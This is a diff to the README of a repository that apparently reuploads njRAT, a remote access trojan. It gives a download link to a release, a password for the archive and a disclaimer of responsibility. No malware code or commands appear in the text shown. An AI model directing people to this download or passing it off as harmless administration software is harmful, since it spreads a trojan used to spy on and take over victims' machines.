st2o1/njRATs/README.md

 # njRAT
 <center>
-  njRAT is a Remote Administration Trojan.
+  njRAT is a Remote Access Trojan.
 </center>

 #  <a href=https://github.com/st2o1/NjRATs/releases/tag/njRAT> Download njRAT </a>

 # Please Use this repository on a Virtual Machine.

-# I'm not responsible for any damage caused by this program.
+# I'm not responsible for any damage caused by this program since this is just a reupload of it.

 # Password for the repository : "st2o1"